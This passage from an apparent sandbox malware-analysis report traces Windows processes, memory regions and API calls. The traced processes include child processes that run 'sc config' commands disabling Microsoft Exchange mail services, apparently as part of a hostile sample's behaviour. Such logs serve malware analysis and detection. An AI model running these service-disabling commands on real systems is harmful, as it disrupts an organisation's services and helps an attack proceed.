"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7583 start_va = 0x9defcf0000 end_va = 0x9defd2ffff entry_point = 0x0 region_type = private name = "private_0x0000009defcf0000" filename = "" Region: id = 7584 start_va = 0x9defd30000 end_va = 0x9defd30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009defd30000" filename = "" Region: id = 7585 start_va = 0x9defd40000 end_va = 0x9defd46fff entry_point = 0x0 region_type = private name = "private_0x0000009defd40000" filename = "" Region: id = 7586 start_va = 0x9defd50000 end_va = 0x9defd50fff entry_point = 0x0 region_type = private name = "private_0x0000009defd50000" filename = "" Region: id = 7587 start_va = 0x9defd60000 end_va = 0x9defd60fff entry_point = 0x0 region_type = private name = "private_0x0000009defd60000" filename = "" Region: id = 7588 start_va = 0x9defd80000 end_va = 0x9defe7ffff entry_point = 0x0 region_type = private name = "private_0x0000009defd80000" filename = "" Region: id = 7589 start_va = 0x9deffe0000 end_va = 0x9deffeffff entry_point = 0x0 region_type = private name = "private_0x0000009deffe0000" filename = "" Region: id = 7590 start_va = 0x9defff0000 end_va = 0x9df0177fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009defff0000" filename = "" Region: id = 7591 start_va = 0x9df0180000 end_va = 0x9df0300fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009df0180000" filename = "" Region: id = 7592 start_va = 0x9df0310000 end_va = 0x9df170ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009df0310000" filename = "" Region: id = 7593 start_va = 0x7ff6c3d70000 end_va = 0x7ff6c3e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3d70000" filename = "" Region: id = 7594 start_va = 0x7ff6c3e9b000 end_va = 0x7ff6c3e9cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3e9b000" filename = "" Region: id = 7595 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 7596 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 7597 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7598 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7599 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 7600 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7601 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7602 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7603 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7604 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7605 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7606 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7607 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7608 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 475 os_tid = 0xf64 Thread: id = 476 os_tid = 0xf5c Thread: id = 477 os_tid = 0xfb8 Process: id = "139" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x3f9ff000" os_pid = "0xfa8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "137" os_parent_pid = "0xf6c" cmd_line = "sc config MSExchangeMailSubmission start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7622 start_va = 0x300000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 7623 start_va = 0x320000 end_va = 0x321fff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 7624 start_va = 0x330000 end_va = 0x343fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 7625 start_va = 0x350000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 7626 start_va = 0x390000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 7627 start_va = 0x3d0000 end_va = 0x3d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 7628 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 7629 start_va = 0x3f0000 end_va = 0x3f1fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 7630 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 7631 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 7632 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7633 start_va = 0x7e6d0000 end_va = 0x7e6f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e6d0000" filename = "" Region: id = 7634 start_va = 0x7e6f9000 end_va = 0x7e6fbfff entry_point = 0x0 region_type = private name = "private_0x000000007e6f9000" filename = "" Region: id = 7635 start_va = 0x7e6fc000 end_va = 0x7e6fcfff entry_point = 0x0 region_type = private name = "private_0x000000007e6fc000" filename = "" Region: id = 7636 start_va = 0x7e6ff000 end_va = 0x7e6fffff entry_point = 0x0 region_type = private name = "private_0x000000007e6ff000" filename = "" Region: id = 7637 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7638 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7639 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 7640 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7641 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 7642 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 7643 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7644 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7645 start_va = 0x5f0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 7646 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7647 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 7648 start_va = 0x310000 end_va = 0x313fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 7649 start_va = 0x400000 end_va = 0x4bdfff entry_point = 0x400000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7650 start_va = 0x4c0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 7651 start_va = 0x500000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 7652 start_va = 0x7d0000 end_va = 0x7dffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 7653 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7654 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7655 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7656 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7657 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7658 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7659 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7660 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7661 start_va = 0x7e5d0000 end_va = 0x7e6cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e5d0000" filename = "" Region: id = 7662 start_va = 0x7e6f6000 end_va = 0x7e6f8fff entry_point = 0x0 region_type = private name = "private_0x000000007e6f6000" filename = "" Region: id = 7663 start_va = 0x6f0000 end_va = 0x7cefff entry_point = 0x6f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 7664 start_va = 0x550000 end_va = 0x561fff entry_point = 0x550000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 479 os_tid = 0xfb0 [0131.006] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0131.006] __set_app_type (_Type=0x1) [0131.006] __p__fmode () returned 0x77ac4d6c [0131.006] __p__commode () returned 0x77ac5b1c [0131.006] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0131.006] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0131.006] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.009] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.009] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0131.009] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0131.009] _wcsicmp (_String1="config", _String2="query") returned -14 [0131.009] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0131.009] _wcsicmp (_String1="config", _String2="start") returned -16 [0131.009] _wcsicmp (_String1="config", _String2="pause") returned -13 [0131.009] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0131.009] _wcsicmp (_String1="config", _String2="control") returned -14 [0131.009] _wcsicmp (_String1="config", _String2="continue") returned -14 [0131.009] _wcsicmp (_String1="config", _String2="stop") returned -16 [0131.009] _wcsicmp (_String1="config", _String2="config") returned 0 [0131.009] ResolveDelayLoadedAPI () returned 0x77262c10 [0131.009] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x5f8570 [0131.011] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0131.011] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0131.011] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0131.011] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0131.011] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0131.011] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0131.011] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0131.011] OpenServiceW (hSCManager=0x5f8570, lpServiceName="MSExchangeMailSubmission", dwDesiredAccess=0x3) returned 0x0 [0131.011] GetLastError () returned 0x424 [0131.012] _ultow (in: _Dest=0x424, _Radix=3995192 | out: _Dest=0x424) returned="1060" [0131.012] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0131.013] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x3cf614, nSize=0x2, Arguments=0x3cf62c | out: lpBuffer="褀_<蔔è") returned 0x62 [0131.013] GetFileType (hFile=0x3c) returned 0x2 [0131.013] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3cf5f8 | out: lpMode=0x3cf5f8) returned 1 [0131.013] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x5f8900*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x3cf608, lpReserved=0x0 | out: lpBuffer=0x5f8900*, lpNumberOfCharsWritten=0x3cf608*=0x62) returned 1 [0131.014] LocalFree (hMem=0x5f8900) returned 0x0 [0131.014] LocalFree (hMem=0x0) returned 0x0 [0131.014] CloseServiceHandle (hSCObject=0x5f8570) returned 1 [0131.014] LocalFree (hMem=0x0) returned 0x0 [0131.014] exit (_Code=1060) Thread: id = 480 os_tid = 0xfac Process: id = "140" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x79adb000" os_pid = "0xf9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeMailboxAssistants start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7665 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 7666 start_va = 0x940000 end_va = 0x493ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 7667 start_va = 0x4940000 end_va = 0x495ffff entry_point = 0x0 region_type = private name = "private_0x0000000004940000" filename = "" Region: id = 7668 start_va = 0x4960000 end_va = 0x4961fff entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 7669 start_va = 0x4970000 end_va = 0x4983fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004970000" filename = "" Region: id = 7670 start_va = 0x4990000 end_va = 0x49cffff entry_point = 0x0 region_type = private name = "private_0x0000000004990000" filename = "" Region: id = 7671 start_va = 0x49d0000 end_va = 0x4acffff entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 7672 start_va = 0x4ad0000 end_va = 0x4ad3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ad0000" filename = "" Region: id = 7673 start_va = 0x4ae0000 end_va = 0x4ae0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ae0000" filename = "" Region: id = 7674 start_va = 0x4af0000 end_va = 0x4af1fff entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 7675 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7676 start_va = 0x7e410000 end_va = 0x7e432fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e410000" filename = "" Region: id = 7677 start_va = 0x7e433000 end_va = 0x7e433fff entry_point = 0x0 region_type = private name = "private_0x000000007e433000" filename = "" Region: id = 7678 start_va = 0x7e43c000 end_va = 0x7e43efff entry_point = 0x0 region_type = private name = "private_0x000000007e43c000" filename = "" Region: id = 7679 start_va = 0x7e43f000 end_va = 0x7e43ffff entry_point = 0x0 region_type = private name = "private_0x000000007e43f000" filename = "" Region: id = 7680 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7681 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7682 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 7683 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7684 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 7685 start_va = 0x4ce0000 end_va = 0x4ceffff entry_point = 0x0 region_type = private name = "private_0x0000000004ce0000" filename = "" Region: id = 7686 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7687 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7688 start_va = 0x4e90000 end_va = 0x4f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e90000" filename = "" Region: id = 7689 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7730 start_va = 0x4940000 end_va = 0x494ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004940000" filename = "" Region: id = 7731 start_va = 0x4b00000 end_va = 0x4bbdfff entry_point = 0x4b00000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7732 start_va = 0x4bc0000 end_va = 0x4bfffff entry_point = 0x0 region_type = private name = "private_0x0000000004bc0000" filename = "" Region: id = 7733 start_va = 0x4cf0000 end_va = 0x4deffff entry_point = 0x0 region_type = private name = "private_0x0000000004cf0000" filename = "" Region: id = 7734 start_va = 0x5160000 end_va = 0x516ffff entry_point = 0x0 region_type = private name = "private_0x0000000005160000" filename = "" Region: id = 7735 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7736 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7737 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7738 start_va = 0x7e310000 end_va = 0x7e40ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e310000" filename = "" Region: id = 7739 start_va = 0x7e439000 end_va = 0x7e43bfff entry_point = 0x0 region_type = private name = "private_0x000000007e439000" filename = "" Region: id = 7740 start_va = 0x4950000 end_va = 0x4953fff entry_point = 0x0 region_type = private name = "private_0x0000000004950000" filename = "" Region: id = 7741 start_va = 0x4960000 end_va = 0x4963fff entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 7742 start_va = 0x5170000 end_va = 0x54a6fff entry_point = 0x5170000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 481 os_tid = 0xfa4 [0131.173] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0131.173] __set_app_type (_Type=0x1) [0131.173] __p__fmode () returned 0x77ac4d6c [0131.173] __p__commode () returned 0x77ac5b1c [0131.173] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0131.173] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0131.173] GetCurrentThreadId () returned 0xfa4 [0131.174] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfa4) returned 0x84 [0131.174] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0131.174] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0131.174] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.176] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.176] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4acf85c | out: phkResult=0x4acf85c*=0x0) returned 0x2 [0131.177] VirtualQuery (in: lpAddress=0x4acf863, lpBuffer=0x4acf814, dwLength=0x1c | out: lpBuffer=0x4acf814*(BaseAddress=0x4acf000, AllocationBase=0x49d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.177] VirtualQuery (in: lpAddress=0x49d0000, lpBuffer=0x4acf814, dwLength=0x1c | out: lpBuffer=0x4acf814*(BaseAddress=0x49d0000, AllocationBase=0x49d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0131.177] VirtualQuery (in: lpAddress=0x49d1000, lpBuffer=0x4acf814, dwLength=0x1c | out: lpBuffer=0x4acf814*(BaseAddress=0x49d1000, AllocationBase=0x49d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0131.177] VirtualQuery (in: lpAddress=0x49d3000, lpBuffer=0x4acf814, dwLength=0x1c | out: lpBuffer=0x4acf814*(BaseAddress=0x49d3000, AllocationBase=0x49d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.177] VirtualQuery (in: lpAddress=0x4ad0000, lpBuffer=0x4acf814, dwLength=0x1c | out: lpBuffer=0x4acf814*(BaseAddress=0x4ad0000, AllocationBase=0x4ad0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0131.177] GetConsoleOutputCP () returned 0x1b5 [0131.177] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0131.177] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0131.177] _get_osfhandle (_FileHandle=1) returned 0x3c [0131.177] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0131.177] _get_osfhandle (_FileHandle=1) returned 0x3c [0131.177] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0131.177] _get_osfhandle (_FileHandle=1) returned 0x3c [0131.177] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0131.178] _get_osfhandle (_FileHandle=0) returned 0x38 [0131.178] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0131.178] _get_osfhandle (_FileHandle=0) returned 0x38 [0131.178] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0131.178] GetEnvironmentStringsW () returned 0x4e97dc0* [0131.178] FreeEnvironmentStringsA (penv="A") returned 1 [0131.178] GetEnvironmentStringsW () returned 0x4e97dc0* [0131.178] FreeEnvironmentStringsA (penv="A") returned 1 [0131.178] RegOpenKeyExW (in: 